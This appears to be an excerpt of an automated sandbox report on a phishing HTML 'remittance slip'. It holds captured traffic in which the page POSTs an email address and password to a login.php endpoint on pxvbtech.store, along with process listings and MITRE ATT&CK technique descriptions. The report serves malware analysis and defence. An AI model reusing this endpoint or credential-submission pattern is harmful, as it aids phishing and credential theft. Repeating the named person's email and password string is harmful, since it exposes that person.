2025-02-25 16:15:10 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:15:24 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=rsq1ju2643hqo4ne3rd4n266ul; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:15:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:15:24 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:15:25 UTC	401	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
2025-02-25 16:15:27 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:15:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:15:27 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:15:33 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:15:33 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:15:44 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=ks185o3cm344va523c4iiplmg2; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:15:44 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:15:44 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Target ID:	0
Start time:	11:12:29
Start date:	25/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Remittance_Slip_kodiakbp.com.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	11:12:35
Start date:	25/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	11:12:52
Start date:	25/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre